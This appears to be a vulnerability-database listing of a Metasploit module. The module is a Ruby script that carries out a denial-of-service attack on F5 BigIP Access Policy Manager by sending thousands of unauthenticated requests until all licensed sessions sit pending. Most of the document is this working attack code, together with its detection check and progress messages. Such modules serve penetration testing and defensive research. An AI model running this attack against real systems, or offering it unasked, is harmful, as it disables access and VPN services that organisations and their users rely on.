F5 BigIP Access Policy Manager Session Exhaustion Denial of Service

2015-03-06T06:55:42
ID MSF:AUXILIARY/DOS/HTTP/F5_BIGIP_APM_MAX_SESSIONS
Type metasploit
Reporter Rapid7
Modified 2017-07-24T13:26:21

Description

This module exploits a resource exhaustion denial of service in F5 BigIP devices. An unauthenticated attacker can establish multiple connections with BigIP Access Policy Manager (APM) and exhaust all available sessions defined in customer license. In the first step of the BigIP APM negotiation the client sends a HTTP request. The BigIP system creates a session, marks it as pending and then redirects the client to an access policy URI. Since BigIP allocates a new session after the first unauthenticated request, and deletes the session only if an access policy timeout expires, the attacker can exhaust all available sessions by repeatedly sending the initial HTTP request and leaving the sessions as pending.

                                        
                                            ##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Auxiliary
  include Msf::Exploit::Remote::HttpClient
  include Msf::Auxiliary::Dos

  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'F5 BigIP Access Policy Manager Session Exhaustion Denial of Service',
      'Description'    => %q{
        This module exploits a resource exhaustion denial of service in F5 BigIP devices. An
        unauthenticated attacker can establish multiple connections with BigIP Access Policy
        Manager (APM) and exhaust all available sessions defined in customer license. In the
        first step of the BigIP APM negotiation the client sends a HTTP request. The BigIP
        system creates a session, marks it as pending and then redirects the client to an access
        policy URI. Since BigIP allocates a new session after the first unauthenticated request,
        and deletes the session only if an access policy timeout expires, the attacker can exhaust
        all available sessions by repeatedly sending the initial HTTP request and leaving the
        sessions as pending.
      },
      'Author'         =>
        [
          'Denis Kolegov <dnkolegov[at]gmail.com>',
          'Oleg Broslavsky <ovbroslavsky[at]gmail.com>',
          'Nikita Oleksov <neoleksov[at]gmail.com>'
        ],
      'References'     =>
        [
          ['URL', 'https://support.f5.com/kb/en-us/products/big-ip_apm/releasenotes/product/relnote-apm-11-6-0.html']
        ],
      'License'        => MSF_LICENSE,
      'DefaultOptions' =>
        {
          'SSL' => true,
          'RPORT' => 443
        }
    ))

    register_options(
      [
        OptInt.new('RLIMIT', [true, 'The number of requests to send', 10000]),
        OptBool.new('FORCE', [true, 'Proceed with attack even if a BigIP virtual server isn\'t detected', false])
      ])
  end

  def run
    limit = datastore['RLIMIT']
    force_attack = datastore['FORCE']

    res = send_request_cgi('method' => 'GET', 'uri' => '/')

    unless res
      print_error("No answer from the BigIP server")
      return
    end

    # Simple test based on HTTP Server header to detect BigIP virtual server
    server = res.headers['Server']
    unless server =~ /BIG\-IP/ || server =~ /BigIP/ || force_attack
      print_error("BigIP virtual server was not detected. Please check options")
      return
    end

    print_status("Starting DoS attack")

    # Start attack
    limit.times do |step|
      if step % 100 == 0
        print_status("#{step * 100 / limit}% accomplished...")
      end
      res = send_request_cgi('method' => 'GET', 'uri' => '/')
      if res && res.headers['Location'] =~ /\/my\.logout\.php3\?errorcode=14/
        print_good("DoS accomplished: The maximum number of concurrent user sessions has been reached.")
        return
      end
    end

    # Check if attack has failed
    res = send_request_cgi('method' => 'GET', 'uri' => uri)
    if res.headers['Location'] =~ /\/my.policy/
      print_error("DoS attack failed. Try to increase the RLIMIT")
    else
      print_status("Result is undefined. Try to manually determine DoS attack result")
    end

    rescue ::Errno::ECONNRESET
      print_error("The connection was reset. Maybe BigIP 'Max In Progress Sessions Per Client IP' counter was reached")
    rescue ::Rex::ConnectionRefused
      print_error("Unable to connect to BigIP")
    rescue ::Rex::ConnectionTimeout
      print_error("Unable to connect to BigIP. Please check options")
    rescue ::OpenSSL::SSL::SSLError
      print_error("SSL/TLS connection error")
  end
end